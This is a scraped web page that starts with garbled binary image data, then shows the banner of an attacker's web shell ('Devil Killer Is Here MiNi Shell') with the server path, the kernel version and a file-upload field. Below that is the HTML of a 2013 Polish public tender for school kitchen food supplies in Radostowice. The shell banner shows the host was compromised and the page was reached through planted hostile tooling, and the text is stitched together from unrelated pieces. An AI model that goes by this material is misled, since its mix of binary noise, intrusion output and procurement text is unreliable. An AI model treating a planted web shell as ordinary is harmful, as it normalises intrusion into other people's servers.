JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131216/520322-N-2013.html

<p class="kh_header"><b>Radostowice: Zakup środków żywieniowych wraz z dostarczeniem na potrzeby kuchni szkolnej 
w Szkole Podstawowej im. J. Brzechwy w Radostowicach na 2014 rok</b><br>
<b>Numer ogłoszenia: 520322 - 2013; data zamieszczenia: 16.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. J. Brzechwy w Radostowicach , ul. Dworcowa 56, 43-262 Radostowice, woj. śląskie, tel. 32 21 52 22, faks 32 212 52 22.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.radostowicesp.edupage.org</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup środków żywieniowych wraz z dostarczeniem na potrzeby kuchni szkolnej 
w Szkole Podstawowej im. J. Brzechwy w Radostowicach na 2014 rok.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup środków żywieniowych wraz z dostarczeniem, na potrzeby kuchni szkolnej w  Szkole Podstawowej im. J. Brzechwy w Radostowicach na 2014 rok, tj.  od 02.01.2014r. do 31.12.2014r.
Szczegółowy wykaz artykułów żywnościowych z podziałem na poszczególne części, wraz z ich rocznym zapotrzebowaniem zawarto w załącznikach do SIWZ. Ustala się VII części podlegających zamówieniu. Wykonawca może złożyć ofertę na całość zamówienia, poszczególną część lub na wybrane części:
1)   Część I - Pieczywo, świeże wyroby piekarskie i ciastkarskie
2)   Część II - Mięso, wędliny, konserwy i wyroby mięsne
3)   Część III - Drób
4)   Część IV - Ryby, przetworzone i konserwowe
      5)   Część V - Warzywa, owoce i przetwory
6)   Część VI - Oleje, tłuszcze zwierzęce i roślinne, produkty mleczarskie i jaja
7)   Część VII - Produkty sypkie i różne produkty spożywcze.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.80.00.00-6, 15.60.00.00-4, 15.50.00.00-3, 15.81.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania warunku wykonawcy zobowiązani są do złożenia oświadczenia z art. 22 ustawy - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony w sytuacji gdy wykonawca wykaże wykonanie w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: co najmniej jedno zamówienie polegające na dostawie ciągłej przez okres minimum 1 roku produktów spożywczych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązania są do złożenia oświadczenia z art. 22 ustawy - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązania są do złożenia oświadczenia z art. 22 ustawy - załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełnienia warunku wykonawcy zobowiązania są do złożenia oświadczenia z art. 22 ustawy - załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>zgodnie z pkt. III.3.2 niniejszego ogłoszenia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykonawca może złożyć jedną ofertę. Złożenie większej liczby ofert lub oferty zawierającej rozwiązania alternatywne lub oferty wariantowej, spowoduje odrzucenie wszystkich ofert złożonych przez danego Wykonawcę.
2.	Oferta musi być wypełniona zgodnie z treścią zał. nr 1 do SIWZ i podpisana przez osoby (osobę) uprawnione do składania oświadczeń woli w imieniu wykonawcy (podpis(y) winien/ny być opatrzony/e pieczęcią imienną osoby (osób) uprawnionych do składania oświadczeń woli w imieniu wykonawcy, a w przypadku braku pieczęci należy złożyć czytelny podpis określający imię i nazwisko w/w osoby (osób). 
3.	Wraz z ofertą należy złożyć odpowiednio na każdą wybraną do realizacji część, wypełnione zał. 1a - 1g do SIWZ.
7.	Jeżeli upoważnienie osób podpisujących ofertę nie wynika bezpośrednio z dokumentów dołączonych do oferty (tj. nie wynika wprost z dokumentów stwierdzających status prawny wykonawcy), to do oferty należy dołączyć stosowne pełnomocnictwo w formie oryginału lub kopii z podpisem notarialnie poświadczonym, zgodnie z postanowieniami określonymi w pkt VI ppkt 8 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmiany treści umowy na podstawie art. 144 ustawy o zamówieniach publicznych, w tym przypadku ustawowej stawki VAT, jednak w sytuacji łącznego spełnienia 2 przesłanek: gdy istnieje obiektywna konieczność wprowadzenia zmian, np. gdy spełnienie świadczenia byłoby połączone z nadmiernymi trudnościami albo groziłoby jednej ze stron rażącą stratą w rozumieniu art.357Kc, zmiana wynika z okoliczności, których nie można było przewidzieć w momencie zawarcia umowy. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w niżej wymienionych przypadkach:
Zmiany: zmiana adresu, siedziby, konta, firmy Zamawiającego, Wykonawcy,
zmiana osób występujących po stronie Zamawiającego, Wykonawcy,
zmiana będąca skutkiem poprawy oczywistej omyłki,
Inne zmiany. Zmiana cen: zmianę cen jednostkowych asortymentu objętego umowa w przypadku zmiany wielkości opakowania wprowadzonej przez producenta z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową. Zmianę cen jednostkowych asortymentu objętego umową na cenę niższą niż ustalona  w umowie z zastrzeżeniem warunków dotyczących ich jakości określonych w SIWZ.
dopuszcza się na wniosek Wykonawcy kwartalną waloryzację cen dostarczanych towarów żywnościowych w oparciu o wskaźnik wzrostu cen towarów i usług konsumpcyjnych ogółem w danym kwartale, podawany przez Prezesa Głównego Urzędu Statystycznego, ogłaszany w Dzienniku Urzędowym R.P. Monitor Polski. Warunkiem zastosowania waloryzacji jest wzrost tego wskaźnika ponad 3% w stosunku kwartał do poprzedniego kwartału. Zamawiający na podstawie art. 144 ustawy dopuści zmianę umowy dotyczącą przedmiotu zamówienia, również w następujących przypadkach: zmiana wysokości wynagrodzenia brutto w przypadku zmiany w okresie    obowiązywania umowy stawki podatku VAT wartość netto pozostaje bez zmian, działania sił natury, uznanego za stan klęski żywiołowej,
gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, a szczególności terminu realizacji zamówienia.
zmiany powszechnie obowiązującego prawa w zakresie mającym wpływ na realizację     umowy po dacie jej podpisania. Określa się następujący tryb dokonywania zmian postanowień umowy: Sposób inicjowania zmian: Wykonawca wnioskuje do Zamawiającego w sprawie możliwości dokonania wskazanej zmiany, niezwłocznie po zajściu okoliczności uzasadniającej zmianę. Przyczyny dokonania zmian postanowień umowy oraz uzasadnienie takich zmian należy opisać w stosownych dokumentach, notatka służbowa, pismo Wykonawcy, protokół konieczności, itp.. W rezultacie dokonania czynności opisanych powyżej może dojść do podpisania przez strony aneksu do umowy. Projekt aneksu przygotuje Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.radostowicesp.edupage.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. J. Brzechwy, 43-262 Radostowice, ul. Dworcowa 56.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2013 godzina 09:00, miejsce: Szkoła Podstawowa im. J. Brzechwy, 43-262 Radostowice, ul. Dworcowa 56.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO, ŚWIEŻE WYROBY PIEKARSKIE I CIASTKARSKIE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb zwykły
1000 g	szt	800
Bułka kanapkowa, wek 300 g	szt	300
Drożdżówka różne smaki 160 g	szt	300
Bułka zwykła 90 g	szt	4000
Rogale zwykłe 100 g	szt	300
Pączki różne smaki 100 g	szt	600
Bułka graham 80 g	szt	300
Bułka tarta 1 kg	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MIĘSO, WĘDLINY, KONSERWY I WYROBY MIĘSNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rosół z/k	kg	50
Łopatka wp. b/k świeża	kg	1600
Karczek wp. b/k	kg	300
Gulaszowe woł. extra	kg	100
Mielonka garmażeryjna	kg	400
Schab b/k	kg	50
Polędwica drobiowa po węgiersku	kg	40
Parówki śląskie	kg	500
Kiełbasa Kminkowa 	kg	150
Boczek wędzony	kg	150
Kiełbasa orawska	kg	60
Kiełbasa szynkowa	kg	20
Kości z kotleta świeże	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> DRÓB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z kurczaka świeży bez widełek	kg	1600
Noga z kurczaka świeża	kg	500
Pasztet drobiowy- konserwa sterylizowany 160 g 	szt	150
Wątróbka drobiowa	kg	100
Szyje z indyka	kg	50
Podudzie 
z kurczaka 
(nie ćwiartka)	kg	700
Filet z indyka	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> RYBY PRZETWORZONE I KONSERWOWANE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z makreli w pomidorach170g	puszki	40 
Filet mintaj mrożony SHP	kg	900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WARZYWA, OWOCE I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki		kg	7000
Fasola Piękny Jaś		kg	50
Groch łuskany 		kg	30
Buraki		kg	600
Cebula		kg	300
Czosnek		kg	10
Kapusta biała		kg	800
Kapusta czerwona		kg	350
Kapusta kiszona		kg	800
Marchew		kg	150
Pietruszka świeża		kg	60
seler		kg	60
Koperek pęczki zielony		pęczek	40
Szczypiorek		pęczek	40
Ogórek konserwowy 1L		szt	40
Sałatka szwedzka 2650 ml Urbanek lub równoważny		szt	100
Sok malinowy 3 L Super Barman lub równoważny		szt	50
Koncentrat pomidorowy 1 L Pudliszki 30% lub równoważny		szt	70
Koncentrat buraczkowy 300 ml Krakus lub równoważny		szt	30
Dżem truskawkowy niskosłodzony pasteryzowany 280 g		szt	80
Brzoskwinia konserwowa 450 g		puszka	10
Truskawka mrożona 500 g		paczka	30
Kalafior mrożony 450g		paczka	30
Zupa jarzynowa 7 składników 450 g		paczka	40
Mrożonki jarzynowe 450 g różne rodzaje		paczka	30
Papryka konserwowa 720 ml Rolnik lub równoważny		szt	30
Fasola zielona szparagowa konserwowa 450 g		szt	30
Kukurydza konserwowa Dawtona 400 g lub równoważny		szt	40
Kalafior świeży		szt	100
Kapusta pekińska		szt	100
Rzodkiewka		pęczek	20
Ogórek zielony		kg	400
Papryka czerwona świeża		kg	10
Pomidor 		kg	100
Cytryna 		kg	5
Pomarańcza 		kg	100
Mandarynka 		kg	400
Banan 		kg	400
Jabłka 		kg	150
Nektarynka 		szt	300
Sałata zielona		szt	90
Sałata lodowa		szt.	40
Musztarda delikatesowa stołowa 900 g		szt	20
Ketchap Tortex łagodny 1 kg lub równoważny		szt	50
Ocet 10% 500 ml		szt	50
Ogórek kiszony op. 10 kg		szt	5
Sok dla dzieci 200 ml		szt	400
Brokuł		szt	20
Por		szt	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> OLEJE TŁUSZCZE ZWIERZĘCE I ROŚLINNE, PRODUKTY MLECZARSKIE I JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej Kujawski lub równoważny		L	500
Margaryna mleczna Bielmar 250g lub równoważny		szt	60
Kefir 400ml		szt	120
Serek Monte 4x58,75 g lub równoważny		szt	100
Serek Danio 140g lub równoważny		szt	100
Masło ekstra 200g		szt	900
Mleko ARO UHT 3,2% lub równoważny		L	1100
Twaróg półtłusty 
250 g dobrej jakości		szt	250
Ser topiony kremowy 100g		szt	40
Ser żółty Gouda Mońki lub równoważny		kg	100
Śmietana Zaro 18% 400 ml lub równoważny		szt	400
Śmietana zakwaszana 18%  400ml 		szt	150
Jaja świeże		szt	10000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2, 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PRODUKTY SYPKIE I RÓŻNE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sól		kg	120
Mąka ziemniaczana Superior lub równoważny		kg	150
Mąka pszenna tortowa		kg	580
Mąka wrocławska		kg	250
Krupiczka		kg	10
Cukier 		kg	1000
Kasza jęczmienna wiejska extra		kg	120
Ryż biały Kupiec lub równoważny		kg	100
Makaron świderki 500 g Lubella lub równoważny		kg	120
Makaron łazanki Lubella 500 g lub równoważny		kg	100
Makaron domowy Czaniec Nitki 250 g lub równoważny		paczka	100
Makaron gwiazdeczki Czaniec 
250 g lub równoważny		paczka	50
Makaron literki 250 g Czaniec lub równoważny		paczka	50
Makaron małe muszelki Lubella lub równoważny		kg	20
Makaron kolanka małe Lubella 250g lub równoważny		paczka	50
Papryka mielona słodka, sypka 700 g Cykoria lub równoważny		paczka	5
Pieprz mielony 800 g Cykoria lub równoważny		paczka	5
Ziele angielskie 500 g Cykoria lub równoważny		paczka	2
Przyprawa warzywna do zup, potraw mięsnych i ryb Kucharek 1000 g lub równoważny		kg	60
Przyprawa w płynie do zup, sosów i sałatek Maga 850 ml Hetmar lub równoważny		szt	90
Herbata granulki		kg	30
Kawa zbożowa 500 g Delekta lub równoważny		paczka	40
Kwasek cytrynowy 
50 g		paczka	100
Kakao 200 g Decommorreno lub równoważny		paczka	10
Proszek do pieczenia 30 g		paczka	20
Cukier waniliowy 30g		paczka 	30
Cukier puder 400g		paczka	30
Budyń śmietankowy Winiary 60 g lub równoważny		paczka	180
Galaretka owocowa 100g		szt	200
Cynamon mielony 15g Prymat lub równoważny		paczka	20
Sos grecki 9 g		paczka 	80
Przyprawa Kebab Gyros 30g Prymat lub równoważny		paczka	20
Sos do pieczeni ciemny Winiary 30 g lub równoważny		paczka	30
Panierka do drobiu 90g Kamis lub równoważny		paczka	50
Fiksy do spaghetti 48 g		paczka 	30
Prince Polo XXL lub równoważny		szt	300
Biszkopt Lajkonik 100g lub równoważny		paczka	30
Wafle w czekoladzie 40g		szt	300
Kinder czekolada 100g lub równoważny		szt	400
Czekolada mleczna Wedel 100g lub równoważny		szt	300
Wafle coctailowe 250g		paczka	40
Płatki owsiane 500g		paczka 	15
Kasza manna		kg	30
Płatki czekoladowe 250g Unopol lub równoważny		paczka	60
Drożdże 100g		szt	120
Krem Nutella 630g lub równoważny		szt	25
Mąka żurkowa 500g Diecolo lub równoważny		kg	50
Majonez dekoracyjny Winiary 700ml lub równoważny		szt	60
Liść laurowy 100 g		paczka	3
Majeranek 100 g		paczka	2
Kisiel 77g		paczka	60.</p></li>
